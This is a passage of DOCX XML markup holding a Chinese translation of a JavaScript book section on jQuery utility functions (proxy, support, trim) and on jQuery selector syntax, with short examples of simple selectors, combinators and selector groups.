        <w:t>数对象的方法调用。它没有像</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法那样实现参数的部分应用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.proxy()</w:t>
      </w:r>
      <w:r>
        <w:t>在调用时还可以传入对象作为第一个参数，传入属性名作为第二个参数。该名称代表的属性值应该是一个函数。通过这种方式调用，函数</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.proxy(o,n)</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.proxy(o[n],o)</w:t>
      </w:r>
      <w:r>
        <w:t>一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.proxy()</w:t>
      </w:r>
      <w:r>
        <w:t>的目的是用来与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序绑定机制一起使用。如果绑定了一个代理函数，可以使用原始函数来解除绑定它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性类似</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.browser,</w:t>
      </w:r>
      <w:r>
        <w:t>它用来做可移植的特性探测（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节），而不是脆弱的浏览器探测。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.support</w:t>
      </w:r>
      <w:r>
        <w:t>的值是一个对象，该对象的属性都是布尔值，用来指明浏览器特性的存在情况。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.support</w:t>
      </w:r>
      <w:r>
        <w:t>的绝大部分属性都是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>内部使用的底层特性。这可能会引起插件开发者的兴趣，但对应用开发者来说大部分都用途不大。一个例外是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.support.boxModel:</w:t>
      </w:r>
      <w:r>
        <w:t>当浏览器使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>标准的</w:t>
      </w:r>
      <w:r>
        <w:t>"context-box"</w:t>
      </w:r>
      <w:r>
        <w:t>模型时，该属性为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，而在</w:t>
      </w:r>
      <w:r>
        <w:t>IE6</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE7</w:t>
      </w:r>
      <w:r>
        <w:t>的怪</w:t>
      </w:r>
      <w:r>
        <w:t>异模式下时为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>（参考</w:t>
      </w:r>
      <w:r>
        <w:t>16.2.3</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>边框盒模型和</w:t>
      </w:r>
      <w:r>
        <w:t>box-sizing</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.trim()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该函数和</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>中给字符串添加的</w:t>
      </w:r>
      <w:r>
        <w:t>trim()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似。它接受字符串作为唯一参数，返回的字符串开头和结尾处的空白字符都已移除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="497" w:name="19_8_jQueryXuan_Ze_Qi_He_Xuan_Qu_Fang_Fa"/>
      <w:r>
        <w:t>19.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器和选取方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="497"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本章中，我们已经使用了带有简单</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选取函数：</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>。现在是时候深入了解</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器语法，以及一些提取和扩充选中元素集的方法了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="498" w:name="19_8_1_jQueryXuan_Ze_Qi_"/>
      <w:r>
        <w:t>19.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="498"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器标准草案定义的选择器语法中，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>支持相当完整的一套子集，同时还添加了一些非标准但很有用的伪类。</w:t>
      </w:r>
      <w:r>
        <w:t>15.2.5</w:t>
      </w:r>
      <w:r>
        <w:t>节描述过基本的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。在此我们会重复一下，并增加对更多高级选择器的阐释。注意：本节讲述的是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器。其中有不少选择器（但不是全部）可以在</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表中使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>选择器语法有三层结构。你肯定已经见过选择器中最简单的形式。</w:t>
      </w:r>
      <w:r>
        <w:t>"#test"</w:t>
      </w:r>
      <w:r>
        <w:t>选取</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"test"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>"blockquote"</w:t>
      </w:r>
      <w:r>
        <w:t>选取文档中的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>blockquote</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，而</w:t>
      </w:r>
      <w:r>
        <w:t>"div.note"</w:t>
      </w:r>
      <w:r>
        <w:t>则选取所有</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"note"</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。简单选择器可以组合成</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>组合选择器</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，比如</w:t>
      </w:r>
      <w:r>
        <w:t>"div.note</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>p"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"blockquote i"</w:t>
      </w:r>
      <w:r>
        <w:t>，只要用组合字符做</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>分隔符就行。简单选择器和组合选择器还可以分组成逗号分隔的列表。这种选择器组是传递给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>函数最常见的形式。在解释组合选择器和选择器组之前，我们必须先了解简单选择器的语法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>简单选择器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>简单选择器的开头部分（显式或隐式地）是标签类型声明。例如，如果只对＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素感兴趣，简单选择器可以用</w:t>
      </w:r>
      <w:r>
        <w:t>"p"</w:t>
      </w:r>
      <w:r>
        <w:t>开头。如果选取的元素和标签名无关，则可以使用通配符</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>号来</w:t>
      </w:r>
      <w:r>
        <w:t>代替。如果选择器没有以标签名或通配符开头，则隐式含有一个通配符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>标签名或通配符指定了备选文档元素的一个初始集。在简单选择器中，标签类型声明之后的部分由零个或多个过滤器组成。过滤器从左到右应用，和书写顺序一致，其中每一个都会缩小选中元素集。表</w:t>
      </w:r>
      <w:r>
        <w:t>19-1</w:t>
      </w:r>
      <w:r>
        <w:t>列举了</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>支持的过滤器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4119113" cy="854015"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="50" name="00050.jpeg" descr="00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00050.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4119113" cy="854015"/>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10464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3912079" cy="5598543"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="51" name="00051.jpeg" descr="000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00051.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3912079" cy="5598543"/>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11488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3851694" cy="5477773"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="52" name="00052.jpeg" descr="000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2.jpeg" descr="00052.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3851694" cy="5477773"/>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12512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4097547" cy="1945256"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="53" name="00053.jpeg" descr="000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3.jpeg" descr="00053.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4097547" cy="1945256"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意：表</w:t>
      </w:r>
      <w:r>
        <w:t>19-1</w:t>
      </w:r>
      <w:r>
        <w:t>中列举的部分选择器在圆括号中接受参</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数。例如，下面这个选择器选取的元素在其父节点的子元素中排行第</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>或第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>等，只要它们含有</w:t>
      </w:r>
      <w:r>
        <w:t>"JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>单词，就不包含＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p:nth-ch</w:t>
      </w:r>
      <w:r>
        <w:t>ild(3n+1):text(JavaScript):not(:has(a))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通常来说，指定标签类型前缀，可以让过滤器的运行更高效。例如，不要简单使用</w:t>
      </w:r>
      <w:r>
        <w:t>":radio"</w:t>
      </w:r>
      <w:r>
        <w:t>来选取单选框按钮，使用</w:t>
      </w:r>
      <w:r>
        <w:t>"input:radio"</w:t>
      </w:r>
      <w:r>
        <w:t>会更好。</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>过滤器是个例外，不添加标签前缀时它会更高效。例如，选择器</w:t>
      </w:r>
      <w:r>
        <w:t>"#address"</w:t>
      </w:r>
      <w:r>
        <w:t>通常比更明确的</w:t>
      </w:r>
      <w:r>
        <w:t>"form#address"</w:t>
      </w:r>
      <w:r>
        <w:t>更高效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>组合选择器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用特殊操作符或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>组合符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>可以将简单选择器组合起来，表达文档树中元素之间的关系。表</w:t>
      </w:r>
      <w:r>
        <w:t>19-2</w:t>
      </w:r>
      <w:r>
        <w:t>列举了</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>支持的组合选择器。这些组合选择</w:t>
      </w:r>
      <w:r>
        <w:t>器与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>支持的组合选择器是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="1522562"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="54" name="00054.jpeg" descr="000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4.jpeg" descr="00054.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="1522562"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面是组合选择器的一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"blockquote i"//</w:t>
      </w:r>
      <w:r>
        <w:t>匹配＜</w:t>
      </w:r>
      <w:r>
        <w:t>blockquote</w:t>
      </w:r>
      <w:r>
        <w:t>＞里的＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"ol</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>li"//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素是＜</w:t>
      </w:r>
      <w:r>
        <w:t>ol</w:t>
      </w:r>
      <w:r>
        <w:t>＞的直接子元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"#output+*"//id="output"</w:t>
      </w:r>
      <w:r>
        <w:t>元素后面的兄弟元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"div.note</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>h1+p"//</w:t>
      </w:r>
      <w:r>
        <w:t>紧跟＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞的＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，在＜</w:t>
      </w:r>
      <w:r>
        <w:t>div class="note"</w:t>
      </w:r>
      <w:r>
        <w:t>＞里面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意组合选择器并不限于组合两个选择器：组合三个甚至更多选择器也是允许的。组合选择器从左到右处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>选择器组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（或在样式表中使用）的选择器就是选择器组，这是一个逗号分隔的列表，由一个或多个简单选择器或组合选择器构成。选择器组匹配的元素只要匹配该选择器组中的任何一个选择器就行。对我们来说，一个简单选择器也可以认为是一个选择器组。下面是选择器组的一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"h1,h2,h3"//</w:t>
      </w:r>
      <w:r>
        <w:t>匹配＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>h2</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>h3</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"#p1,#p2,#p3"//</w:t>
      </w:r>
      <w:r>
        <w:t>匹配</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>p1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>p2</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>p3</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"div.note,p.note"//</w:t>
      </w:r>
      <w:r>
        <w:t>匹配</w:t>
      </w:r>
      <w:r>
        <w:t>class="note"</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>p,div.not</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>p"//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
